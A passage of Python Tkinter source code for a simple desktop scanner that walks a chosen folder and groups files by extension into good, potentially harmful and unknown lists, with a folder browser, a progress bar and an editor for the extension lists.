self.update_scan_flags(False,False,True)\r\n self.update_frames()\r\n\r\n def update_scan_flags(self,directory_set_flag,process_running_flag,scan_finished_flag):\r\n self.process_running=process_running_flag\r\n self.directory_set=directory_set_flag\r\n self.scan_finished=scan_finished_flag\r\n\r\n\r\nclass FileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n self.__setup_file_types_frames()\r\n\r\n def __setup_file_types_frames(self):\r\n self.ok_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.bad_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.unknown_files_frame=TkinterWrapper.WindowFrame(self.frame)\r\n for frame in [[self.ok_files_frame,\"left\"],[self.bad_files_frame,\"left\"],[self.unknown_files_frame,\"left\"]]:\r\n frame[0].pack_frame(frame[1],0,0)\r\n\r\n def update_frame(self,directory_set,process_running,scan_finished):\r\n self.destroy_all_widgets(scan_finished)\r\n if (process_running==False or directory_set==False) and scan_finished!=True:\r\n for item in [[self.ok_files_frame,\"Ok\"],[self.bad_files_frame,\"Potentialy Harmfull\"],[self.unknown_files_frame,\"Unknown\"]]:\r\n item[0].configure_border(\"ridge\",2)\r\n self.insert_file_explaning_note(item[0],item[1])\r\n elif process_running==True and directory_set==True:\r\n self.listboxes=[]\r\n self.update_file_frame_for_task(self.ok_files_frame.get_frame(),\"Ok\")\r\n self.update_file_frame_for_task(self.bad_files_frame.get_frame(),\"Potentialy Harmfull\")\r\n self.update_file_frame_for_task(self.unknown_files_frame.get_frame(),\"Unknown\")\r\n\r\n def destroy_all_widgets(self,scan_finished):\r\n if scan_finished!=True:\r\n for frame in [self.ok_files_frame,self.bad_files_frame,self.unknown_files_frame]:\r\n frame.destroy_all_child_widgets()\r\n\r\n def insert_file_explaning_note(self,frame,text):\r\n information_label=TkinterWrapper.WindowLabel(frame.get_frame(),\"{0} files will be\\nshown here after a scan\".format(text))\r\n information_label.configure_colors(\"grey50\",\"grey95\",\"times 10\")\r\n information_label.pack_label(\"top\",0,2)\r\n\r\n def update_file_frame_for_task(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,\"{0} Files:\".format(text))\r\n label.configure_colors(\"grey60\",\"grey95\",\"times 12\")\r\n label.pack_label(\"top\",0,0)\r\n self.setup_textbox_frame(frame)\r\n self.setup_textbox_x_scrollbar_frame(frame)\r\n\r\n def setup_textbox_frame(self,file_frame):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n listbox=TkinterWrapper.WindowListbox(frame.get_frame())\r\n listbox.pack_listbox(\"left\",0,0)\r\n listbox.configure_size(40,30)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"y\")\r\n scrollbar.attach_to_widget(listbox.get_listbox())\r\n listbox.attach_scrollbar(\"y\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"left\",0,0)\r\n self.listboxes.append(listbox)\r\n\r\n def setup_textbox_x_scrollbar_frame(self,file_frame,):\r\n frame=TkinterWrapper.WindowFrame(file_frame)\r\n frame.pack_frame(\"top\",0,0)\r\n scrollbar=TkinterWrapper.WindowScrollbar(frame.get_frame(),\"x\")\r\n scrollbar.attach_to_widget(self.listboxes[len(self.listboxes)-1].get_listbox())\r\n self.listboxes[len(self.listboxes)-1].attach_scrollbar(\"x\",scrollbar.get_scrollbar())\r\n scrollbar.pack_scrollbar(\"top\",0,0) \r\n\r\n def get_listboxes(self):\r\n return self.listboxes\r\n\r\n\r\nclass CurrentFileInfo(object):\r\n def __init__(self,frame):\r\n self.frame=frame\r\n self.__setup_dummy_frame()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def __setup_dummy_frame(self):\r\n dummy_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n dummy_frame.pack_frame(\"top\",0,0)\r\n\r\n def setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.frame.get_frame())\r\n for frame,position in [[self.top_frame,\"top\"],[self.bottom_frame,\"top\"]]:\r\n frame.pack_frame(position,0,0)\r\n\r\n def make_labels(self):\r\n self.file_fraction=TkinterWrapper.WindowLabel(self.top_frame.get_frame(),\"\")\r\n self.file_fraction.configure_colors(\"grey40\",\"grey95\",\"times 11\")\r\n self.current_file=TkinterWrapper.WindowLabel(self.bottom_frame.get_frame(),\"Current File:\")\r\n self.current_file.configure_colors(\"grey40\",\"grey95\",\"times 10\")\r\n self.file_entry=TkinterWrapper.WindowEntry(self.bottom_frame.get_frame())\r\n self.file_entry.configure_size(115)\r\n\r\n def update_frame(self,process_running):\r\n if process_running==True:\r\n self.file_fraction.pack_label(\"top\",0,0)\r\n self.current_file.pack_label(\"left\",0,0)\r\n self.file_entry.pack_entry(\"left\",0,0)\r\n else:\r\n self.top_frame.destroy()\r\n self.bottom_frame.destroy()\r\n self.setup_frames()\r\n self.make_labels()\r\n\r\n def update_file_fraction(self,numerator,denominator):\r\n self.file_fraction.configure_text(\"{0} out of {1} files scanned\".format(numerator,denominator))\r\n def update_current_file(self,current_file_directory):\r\n self.file_entry.configure_entry_text(\"{0}\".format(current_file_directory))\r\n\r\n\r\nclass ScanGUI(object):\r\n def __init__(self,file_listboxes,progress_bar,current_info):\r\n self.file_listboxes=file_listboxes\r\n self.progress_bar=progress_bar\r\n self.current_file_information=current_info\r\n self.selections=[[\"\",\"\"],[\"\",\"\"],[\"\",\"\"]]\r\n self.listbox_being_used=[False,False,False]\r\n\r\n def update_file_lists(self,files):\r\n self.file_list=files\r\n self.check_for_selection()\r\n for x in range(0,3):\r\n if self.listbox_being_used[x]==False:\r\n self.file_listboxes[x].delete_text(0,\"end\")\r\n for file in files:\r\n if (file.get_file_consensus()==\"KnownGood\" and self.listbox_being_used[0]==False) or\\\r\n (file.get_file_consensus()==\"KnownBad\" and self.listbox_being_used[1]==False) or\\\r\n (file.get_file_consensus()==\"Unknown\" and self.listbox_being_used[2]==False):\r\n self.add_item_to_listbox(file.get_file_consensus(),file.get_file_extension(),file.get_number_of_files())\r\n\r\n def add_item_to_listbox(self,item_consensus,item_name,number_of_item):\r\n if item_consensus==\"KnownGood\":\r\n self.file_listboxes[0].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"KnownBad\":\r\n self.file_listboxes[1].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n elif item_consensus==\"Unknown\":\r\n self.file_listboxes[2].insert_text(\"{0} {1:4s} Files ({2})\\n\".format(RIGHT_TRIANGLE,item_name,number_of_item),\"end\")\r\n\r\n def update_progress_bar(self,percentage,part,total_parts):\r\n self.progress_bar.update(percentage,part,total_parts)\r\n\r\n def update_current_information(self,numerator,denominator,current_file_directory):\r\n self.current_file_information.update_file_fraction(numerator,denominator)\r\n self.current_file_information.update_current_file(current_file_directory)\r\n\r\n def start_checking_for_selection(self):\r\n self.check_for_selection()\r\n #This is not a good solution, better way to check every 250ms?\r\n self.file_listboxes[0].get_listbox().after(250,self.start_checking_for_selection)\r\n\r\n def check_for_selection(self):\r\n for x in range(0,3):\r\n self.selections[x][0]=self.file_listboxes[x].get_current_selection()\r\n self.selections[x][0]=self.file_listboxes[x].get_text_from_index(self.selections[x][0])\r\n for x in range(0,3):\r\n if self.selections[x][0]!=self.selections[x][1] and self.selections[x][0]!=None:\r\n print(\"Selection in listbox {0} has changed to: {1}\".format(x,self.selections[x][0]))\r\n self.selection_actions(x)\r\n self.selections[x][1]=self.selections[x][0]\r\n\r\n def selection_actions(self,listbox):\r\n if RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.show_file_type_places(self.selections[listbox][0],listbox)\r\n elif LEFT_TRIANGLE in self.selections[listbox][0]:\r\n self.go_back_to_file_type_list(listbox)\r\n elif SMALL_RIGHT_TRIANGLE in self.selections[listbox][0]:\r\n self.open_file_explorer(self.selections[listbox][0])\r\n\r\n def show_file_type_places(self,selection,listbox):\r\n self.listbox_being_used[listbox]=True\r\n print(\"Selection: \"+selection)\r\n for file in self.file_list:\r\n if file.get_file_extension()==self.get_file_extension_from_selection(selection):\r\n self.insert_file_places(file,listbox)\r\n\r\n def get_file_extension_from_selection(self,selection):\r\n file_extension=\"\"\r\n for x in range(2,len(selection)):\r\n if selection[x]!=\" \" and selection[x]!=\"(\" and selection[x]!=\")\":\r\n file_extension+=selection[x]\r\n else:\r\n return file_extension\r\n\r\n def insert_file_places(self,file_type,listbox):\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n self.add_directional_information(listbox)\r\n for item in file_type.get_file_type_locations():\r\n self.file_listboxes[listbox].insert_text(\"{0} {1}\\n\".format(SMALL_RIGHT_TRIANGLE,item),\"end\")\r\n\r\n def add_directional_information(self,listbox):\r\n self.file_listboxes[listbox].insert_text(\"{0} Back to File List\\n\".format(LEFT_TRIANGLE),\"end\")\r\n self.file_listboxes[listbox].insert_text(\"{0} {1} Files\\n\".format(DOWN_TRIANGLE,self.get_file_extension_from_selection\\\r\n (self.selections[listbox][0])),\"end\")\r\n\r\n def go_back_to_file_type_list(self,listbox):\r\n self.listbox_being_used[listbox]=False\r\n self.file_listboxes[listbox].delete_text(0,\"end\")\r\n for file in self.file_list:\r\n if file.get_file_consensus()==\"KnownGood\" and listbox==0:\r\n self.add_item_to_listbox(\"KnownGood\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"KnownBad\" and listbox==1:\r\n self.add_item_to_listbox(\"KnownBad\",file.get_file_extension(),file.get_number_of_files())\r\n elif file.get_file_consensus()==\"Unknown\" and listbox==2:\r\n self.add_item_to_listbox(\"Unknown\",file.get_file_extension(),file.get_number_of_files())\r\n\r\n def open_file_explorer(self,file_location):\r\n file_location=file_location[2:len(file_location):1]\r\n for x in range(len(file_location)-1,0,-1):\r\n if file_location[x]==\"\\\\\":\r\n file_location=file_location[0:x:1]\r\n break\r\n os.startfile(r\"{0}\".format(file_location))\r\n\r\n\r\nclass Progressbar(TkinterWrapper.WindowCanvas):\r\n def __init__(self,frame,length,height):\r\n self.length=length\r\n self.height=height\r\n self.percentage=0\r\n self.rectangle_point=0\r\n super(Progressbar, self).__init__(frame,self.length,height)\r\n super(Progressbar, self).pack_canvas(\"top\",0,0)\r\n\r\n def update(self,percentage,part,total_parts):\r\n self.percentage=percentage\r\n super(Progressbar, self).delete_all_contents()\r\n self.update_part(part,total_parts)\r\n self.update_rectangle()\r\n self.update_text()\r\n self.canvas.update()\r\n\r\n def update_part(self,part,total_parts):\r\n super(Progressbar, self).add_text(self.length/2,6,\"Part {0} of {1}\".format(part,total_parts),\"grey10\",\"times 9\")\r\n\r\n def update_rectangle(self):\r\n super(Progressbar, self).add_rectangle(2,13,self.length,self.height,\"lightblue\")\r\n if self.percentage==\"GoThrough\":\r\n self.calculate_go_through_rectangle()\r\n super(Progressbar, self).add_rectangle(self.rectangle_point,13,self.rectangle_point+100,self.height,\"cornflowerblue\")\r\n else:\r\n self.rectangle_point=self.length*self.percentage\r\n super(Progressbar, self).add_rectangle(2,13,self.rectangle_point,self.height,\"cornflowerblue\")\r\n\r\n def calculate_go_through_rectangle(self):\r\n if self.rectangle_point>=self.length:\r\n self.rectangle_point=0\r\n else:\r\n self.rectangle_point+=0.05\r\n \r\n def update_text(self):\r\n if type(self.percentage).__name__!='str':\r\n if self.percentage<=0.95:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey10\",\"times 14\")\r\n else:\r\n super(Progressbar, self).add_text(370,self.height-8,\"{0}%\".format(int(self.percentage*100)),\"grey80\",\"times 14\")\r\n\r\n \r\nclass Scan(object):\r\n def __init__(self,directory,scan_gui):\r\n self.scan_directory=directory\r\n self.scan_gui=scan_gui\r\n self.set_scan_variables()\r\n self.known_good_filetypes=saved_information.get_known_good_filetypes()\r\n self.known_bad_filetypes=saved_information.get_known_bad_filetypes()\r\n \r\n def set_scan_variables(self):\r\n self.current_directory=\"\"\r\n self.scaned_files=0\r\n self.file_extensions=[]\r\n self.file_type_object_list=[]\r\n \r\n def start(self):\r\n self.set_scan_variables()\r\n self.set_number_of_files()\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n for name in files:\r\n self.current_directory=\"{0}\\\\{1}\".format(root,name)\r\n self.scan_file(root,name)\r\n self.update_scan_gui(2)\r\n\r\n def set_number_of_files(self):\r\n print(self.scan_directory)\r\n self.number_of_files=0\r\n for root, dirs, files in os.walk(\"{0}\".format(self.scan_directory), topdown=True):\r\n self.number_of_files+=len(files)\r\n self.update_scan_gui(1)\r\n print(\"Number of files: {0}\".format(self.number_of_files))\r\n\r\n def scan_file(self,root,file):\r\n file_name,file_extension=os.path.splitext(\"{0}\".format(file))\r\n self.append_file_type(file_extension)\r\n self.update_file_type_object_list(root,file_extension,file_name)\r\n self.scaned_files+=1\r\n\r\n def append_file_type(self,file_extension):\r\n if file_extension not in self.file_extensions:\r\n self.file_extensions.append(file_extension)\r\n\r\n def update_file_type_object_list(self,file_path,file_extension,file_name):\r\n for item in self.file_type_object_list:\r\n if item.get_file_extension()==file_extension:\r\n item.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n break\r\n else:\r\n self.check_file_type_and_add_to_list(file_path,file_extension,file_name)\r\n\r\n def check_file_type_and_add_to_list(self,file_path,file_extension,file_name):\r\n if file_extension in self.known_good_filetypes:\r\n initilizer=\"KnownGood\"\r\n elif file_extension in self.known_bad_filetypes:\r\n initilizer=\"KnownBad\"\r\n else:\r\n initilizer=\"Unknown\"\r\n new_file_type=FileType(file_extension,initilizer)\r\n new_file_type.add_file_to_list(\"{0}\\\\{1}\".format(file_path,file_name))\r\n self.file_type_object_list.append(new_file_type)\r\n\r\n def update_scan_gui(self,part):\r\n if part==1:\r\n percent=\"GoThrough\"\r\n elif part==2:\r\n percent=self.scaned_files/self.number_of_files\r\n self.scan_gui.update_current_information(self.scaned_files,self.number_of_files,self.current_directory)\r\n self.scan_gui.update_progress_bar(percent,part,2)\r\n self.scan_gui.update_file_lists(self.file_type_object_list)\r\n\r\n\r\nclass FileType(object):\r\n def __init__(self,file_extension,file_consensus):\r\n self.file_extension=file_extension\r\n self.file_consensus=file_consensus\r\n self.file_type_locations=[]\r\n\r\n def get_file_extension(self):\r\n return self.file_extension\r\n def get_file_consensus(self):\r\n return self.file_consensus\r\n def get_number_of_files(self):\r\n return len(self.file_type_locations)\r\n def get_file_type_locations(self):\r\n return self.file_type_locations\r\n \r\n def add_file_to_list(self,file_path):\r\n self.file_type_locations.append(\"{0}{1}\".format(file_path,self.file_extension))\r\n\r\n def print_information(self):\r\n print(\"File extenstion: {0}\".format(self.file_extension))\r\n for item in self.file_type_locations:\r\n print(\" -> {0}\".format(item),end=\"\")\r\n print(\"\\t{0:7s} Consensus: {1}\".format(\"\",self.file_consensus))\r\n \r\n\r\nclass FileTypeEditor(object):\r\n def __init__(self,parrent_window,edit_type):\r\n self.edit_type=edit_type\r\n self.set_file_type_list()\r\n self.window=TkinterWrapper.DialogBox(parrent_window,\"Edit {0} File Types\".format(edit_type))\r\n self.__setup_window()\r\n self.__setup_frames()\r\n self.__setup_left_frame()\r\n self.__setup_right_frame()\r\n self.__setup_bottom_frame()\r\n self.update_listbox_text()\r\n\r\n def set_file_type_list(self):\r\n if self.edit_type==\"KnownGood\":\r\n self.file_type_list=saved_information.get_known_good_filetypes()\r\n elif self.edit_type==\"KnownBad\":\r\n self.file_type_list=saved_information.get_known_bad_filetypes()\r\n self.delete_list=[]\r\n self.append_list=[]\r\n \r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n self.window.bind_action(\"\",self.add_file_type)\r\n\r\n def __setup_frames(self):\r\n self.top_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.bottom_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.left_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n self.right_frame=TkinterWrapper.WindowFrame(self.top_frame.get_frame())\r\n for item in [[self.top_frame,\"top\"],[self.left_frame,\"left\"],[self.right_frame,\"right\"],\r\n [self.bottom_frame,\"bottom\"]]:\r\n item[0].pack_frame(item[1],1,0)\r\n self.left_frame.configure_border(\"ridge\",2)\r\n\r\n def __setup_right_frame(self):\r\n self.file_type_listbox=TkinterWrapper.WindowListbox(self.right_frame.get_frame())\r\n self.file_type_listbox.configure_size(20,10)\r\n self.file_type_listbox.pack_listbox(\"left\",0,0)\r\n y_scrollbar=TkinterWrapper.WindowScrollbar(self.right_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(self.file_type_listbox.get_listbox())\r\n self.file_type_listbox.attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_left_frame(self):\r\n self.insert_explanitory_label(self.left_frame.get_frame(),\"Enter File Extension to Add:\")\r\n self.__setup_entry_frame()\r\n self.insert_explanitory_label(self.left_frame.get_frame(),\"Select a File Extension to Delete\")\r\n self.insert_button(self.left_frame.get_frame(),\"Delete\",self.delete_file_type,\"top\")\r\n self.error_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n self.error_frame.pack_frame(\"top\",0,0)\r\n \r\n def __setup_entry_frame(self):\r\n entry_frame=TkinterWrapper.WindowFrame(self.left_frame.get_frame())\r\n entry_frame.pack_frame(\"top\",0,0)\r\n self.file_type_entry=TkinterWrapper.WindowEntry(entry_frame.get_frame())\r\n self.file_type_entry.configure_size(20)\r\n self.file_type_entry.pack_entry(\"left\",0,2)\r\n self.insert_button(entry_frame.get_frame(),\"Add\",self.add_file_type,\"left\")\r\n\r\n def __setup_bottom_frame(self):\r\n self.insert_button(self.bottom_frame.get_frame(),\"Cancel\",partial(self.window.destroy_window,False),\"left\")\r\n self.insert_button(self.bottom_frame.get_frame(),\"Save\",self.save_all_file_types_and_exit,\"left\")\r\n\r\n def insert_explanitory_label(self,frame,text):\r\n label=TkinterWrapper.WindowLabel(frame,text)\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,10)\r\n\r\n def insert_button(self,frame,button_text,button_action,side):\r\n button=TkinterWrapper.WindowButton(frame,button_text,button_action)\r\n button.pack_button(side,2,2)\r\n\r\n def add_file_type(self,*args):\r\n new_file_type=self.file_type_entry.get_entry()\r\n if len(new_file_type)>0 and new_file_type[0]==\".\" and (new_file_type not in self.file_type_list):\r\n self.file_type_list.append(new_file_type)\r\n self.append_list.append(new_file_type)\r\n self.update_listbox_text()\r\n self.file_type_entry.configure_entry_text(\"\")\r\n else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please enter a valid file type\")\r\n self.file_type_entry.select_range(0,\"end\")\r\n \r\n def delete_file_type(self):\r\n selection=self.file_type_listbox.get_current_selection()\r\n selection=self.file_type_listbox.get_text_from_index(selection)\r\n if selection!=None:\r\n for x in range(0,len(self.file_type_list)):\r\n if self.file_type_list[x]==selection:\r\n self.delete_list.append(self.file_type_list[x])\r\n del(self.file_type_list[x])\r\n break\r\n self.update_listbox_text()\r\n else:\r\n user_error=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Please select a file to delete\")\r\n \r\n def update_listbox_text(self):\r\n self.file_type_listbox.delete_text(0,\"end\")\r\n for item in self.file_type_list:\r\n self.file_type_listbox.insert_text(\"{0}\\n\".format(item),\"end\")\r\n\r\n def save_all_file_types_and_exit(self):\r\n for item in self.delete_list:\r\n saved_information.delete_file_type(self.edit_type,item)\r\n for item in self.append_list:\r\n saved_information.add_file_type(self.edit_type,item)\r\n self.window.destroy_window(False)\r\n\r\n \r\nclass SetDirWindow(object):\r\n def __init__(self,parent_window):\r\n self.window=TkinterWrapper.DialogBox(parent_window,\"Choose Folder\")\r\n self.directory_to_search=\"\"\r\n self.__setup_window()\r\n self.__setup_frames()\r\n self.__setup_information_frame()\r\n self.__setup_directory_frame()\r\n self.__setup_button_frame()\r\n self.window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.window.remove_min_max_buttons(True)\r\n self.window.resizable(False,False)\r\n\r\n def __setup_frames(self):\r\n self.information_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.directory_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.button_frame=TkinterWrapper.WindowFrame(self.window.get_window())\r\n self.information_frame.pack_frame(\"top\",0,0)\r\n self.directory_frame.pack_frame(\"top\",0,0)\r\n self.button_frame.pack_frame(\"top\",0,0)\r\n\r\n def __setup_information_frame(self):\r\n description_label=TkinterWrapper.WindowLabel(self.information_frame.get_frame(),\"\")\r\n description_label.configure_text(\"Please chose a file to search from the list below:\")\r\n description_label.configure_colors(\"grey20\",\"grey95\",\"times 11\")\r\n description_label.pack_label(\"top\",0,5)\r\n\r\n def __setup_directory_frame(self):\r\n self.__setup_directory_entry_frame()\r\n self.__setup_directory_listbox_frame()\r\n\r\n def __setup_directory_entry_frame(self):\r\n directory_entry_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_entry_frame.pack_frame(\"top\",0,0)\r\n current_directory_label=TkinterWrapper.WindowLabel(directory_entry_frame.get_frame(),\"Current Directory:\\n\")\r\n current_directory_label.pack_label(\"left\",0,0)\r\n current_directory_label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n self.current_directory_entry=TkinterWrapper.WindowEntry(directory_entry_frame.get_frame())\r\n self.current_directory_entry.configure_size(65)\r\n self.current_directory_entry.pack_entry(\"top\",0,0)\r\n x_scrollbar=TkinterWrapper.WindowScrollbar(directory_entry_frame.get_frame(),\"x\")\r\n x_scrollbar.attach_to_widget(self.current_directory_entry.get_entry_widget())\r\n self.current_directory_entry.attach_scrollbar(x_scrollbar.get_scrollbar())\r\n x_scrollbar.pack_scrollbar(\"bottom\",0,0)\r\n\r\n def __setup_directory_listbox_frame(self):\r\n directory_listbox_frame=TkinterWrapper.WindowFrame(self.directory_frame.get_frame())\r\n directory_listbox_frame.pack_frame(\"top\",0,0)\r\n self.dir_listbox=DirectoryListbox(directory_listbox_frame.get_frame(),self.current_directory_entry)\r\n\r\n def __setup_button_frame(self):\r\n self.search_button=TkinterWrapper.WindowButton(self.button_frame.get_frame(),\"Scan\",self.set_directory_and_destory_window)\r\n self.search_button.pack_button(\"top\",0,0)\r\n\r\n def set_directory_and_destory_window(self):\r\n self.directory_to_search=self.current_directory_entry.get_entry()\r\n print(\"Directory to scan: \"+self.directory_to_search)\r\n self.window.destroy_window(True)\r\n def get_saved_directory(self):\r\n return self.directory_to_search\r\n \r\n\r\n#Might have to split up into two classes: DirectoryListboxFormating and DirectoryListboxActions\r\nclass DirectoryListbox(TkinterWrapper.WindowListbox):\r\n def __init__(self,frame,companion_text_entry):\r\n self.frame=frame\r\n self.selections=[\"\",\"\"]\r\n self.current_directory_entry=companion_text_entry\r\n self.computer_directory=ComputerDirectory()\r\n self.__setup_listbox_frame()\r\n self.__setup_error_frame()\r\n self.insert_harddrives()\r\n self.start_checking_for_selection()\r\n\r\n def __setup_listbox_frame(self):\r\n self.listbox_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.listbox_frame.pack_frame(\"top\",0,0)\r\n super(DirectoryListbox, self).__init__(self.listbox_frame.get_frame())\r\n super(DirectoryListbox, self).pack_listbox(\"left\",0,0)\r\n super(DirectoryListbox, self).configure_size(80,10)\r\n self.__setup_scrollbar()\r\n def __setup_scrollbar(self):\r\n y_scrollbar=TkinterWrapper.WindowScrollbar(self.listbox_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(super(DirectoryListbox, self).get_listbox())\r\n super(DirectoryListbox, self).attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_error_frame(self):\r\n self.error_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.error_frame.pack_frame(\"top\",0,0)\r\n\r\n def insert_harddrives(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for harddrive in self.computer_directory.get_harddrives():\r\n print(harddrive)\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(RIGHT_TRIANGLE,harddrive),\"end\")\r\n\r\n def start_checking_for_selection(self):\r\n self.selections[0]=super(DirectoryListbox, self).get_current_selection()\r\n self.selections[0]=super(DirectoryListbox, self).get_text_from_index(self.selections[0])\r\n if self.selections[0]!=self.selections[1] and self.selections[0]!=None:\r\n print(\"Selection changed to: {0}\".format(self.selections[0]))\r\n self.selection_actions()\r\n self.selections[1]=self.selections[0]\r\n self.frame.after(250,self.start_checking_for_selection)\r\n\r\n def selection_actions(self):\r\n if RIGHT_TRIANGLE in self.selections[0]:\r\n self.go_to_subdirectory()\r\n elif LEFT_TRIANGLE in self.selections[0]:\r\n self.go_up_directory()\r\n\r\n def go_to_subdirectory(self):\r\n self.computer_directory.set_current_directory(self.get_rid_of_arrows_in_directory(self.selections[0]))\r\n subdirectories=self.computer_directory.get_sub_directories()\r\n if subdirectories!=\"ACCESS DENIED\":\r\n self.update_directory_entry()\r\n self.add_directional_information()\r\n for subdirectory in subdirectories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,subdirectory),\"end\")\r\n else:\r\n error_message=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Access to file was denied.\")\r\n self.go_up_directory()\r\n print(\"Access to file denied\")\r\n\r\n def add_directional_information(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} Back to {1}\\n\".format(LEFT_TRIANGLE,self.computer_directory.get_previous_directory()),\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(DOWN_TRIANGLE,self.computer_directory.get_current_directory()),\"end\")\r\n\r\n def get_rid_of_arrows_in_directory(self,directory):\r\n for x in range(0,len(directory)):\r\n if (directory[x]!=RIGHT_TRIANGLE and directory[x]!=DOWN_TRIANGLE and directory[x]!=LEFT_TRIANGLE)\\\r\n and ((x!=1 or x!=2 or x!=3) and (directory[x]!=\" \")):\r\n directory=directory[x:len(directory):1]\r\n break\r\n return directory\r\n\r\n def go_up_directory(self):\r\n self.computer_directory.trim_from_current_directory(1)\r\n self.update_directory_entry()\r\n new_directories=self.computer_directory.get_sub_directories()\r\n if new_directories!=self.computer_directory.get_harddrives():\r\n self.add_directional_information()\r\n else:\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for new_directory in new_directories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,new_directory),\"end\")\r\n\r\n def update_directory_entry(self):\r\n self.current_directory_entry.configure_entry_text(self.computer_directory.get_formated_current_directory())\r\n \r\n \r\nclass ComputerDirectory(object):\r\n def __init__(self):\r\n self.harddrives=[]\r\n self.current_directory=[]\r\n self.formated_current_directory=\"\"\r\n self.find_harddrives()\r\n\r\n def find_harddrives(self):\r\n self.harddrives=[\"{0}:\".format(drive) for drive in ALAPHABET if os.path.exists(\"{0}:\\\\\".format(drive))]\r\n def get_harddrives(self):\r\n return self.harddrives\r\n\r\n def set_current_directory(self, directory):\r\n self.current_directory.append(\"{0}\\\\\".format(directory))\r\n self.set_formated_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def get_current_directory(self):\r\n return self.current_directory[len(self.current_directory)-1]\r\n def get_previous_directory(self):\r\n if len(self.current_directory)==1:\r\n return \"Hard drives\"\r\n else:\r\n return self.current_directory[(len(self.current_directory)-1)-1]\r\n\r\n def trim_from_current_directory(self,number_of_levels):\r\n self.delete_last_directories(number_of_levels)\r\n self.set_formated_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def delete_last_directories(self,number_of_levels):\r\n for x in range(0,len(self.current_directory)):\r\n if len(self.current_directory)-x<=number_of_levels:\r\n del(self.current_directory[x])\r\n break\r\n print(self.current_directory)\r\n\r\n def get_sub_directories(self):\r\n if len(self.current_directory)==0:\r\n return self.harddrives\r\n else:\r\n try:\r\n os.listdir(self.formated_current_directory)\r\n except:\r\n print(\"Error opening file\")\r\n return \"ACCESS DENIED\"\r\n else:\r\n sub_directories=[sub_dir for sub_dir in os.listdir(self.formated_current_directory) if os.path.isdir(os.path.join(self.formated_current_directory, sub_dir))]\r\n print(sub_directories)\r\n return sub_directories\r\n \r\n def set_formated_current_directory(self):\r\n self.formated_current_directory=\"\"\r\n for x in range(0,len(self.current_directory)):\r\n self.formated_current_directory=\"{0}{1}\".format(self.formated_current_directory,self.current_directory[x])\r\n print(\"Formated Cur Dir: \"+self.formated_current_directory)\r\n def get_formated_current_directory(self):\r\n return self.formated_current_directory\r\n\r\n\r\nclass SavedInfo(object):\r\n def __init__(self):\r\n self.known_good_file=FileWrapper.File(os.curdir,\"KnownGoodFiletypes.txt\")\r\n self.known_bad_file=FileWrapper.File(os.curdir,\"KnownBadFiletypes.txt\")\r\n self.__setup_filetypes()\r\n self.directory_to_scan=\"\"\r\n\r\n def __setup_filetypes(self):\r\n self.known_good_filetypes=self.known_good_file.read_lines(0,'end')\r\n self.known_bad_filetypes=self.known_bad_file.read_lines(0,'end')\r\n\r\n def get_known_good_filetypes(self):\r\n good_file_types=self.known_good_filetypes\r\n return good_file_types[0:len(good_file_types)]\r\n def get_known_bad_filetypes(self):\r\n bad_file_types=self.known_bad_filetypes\r\n return 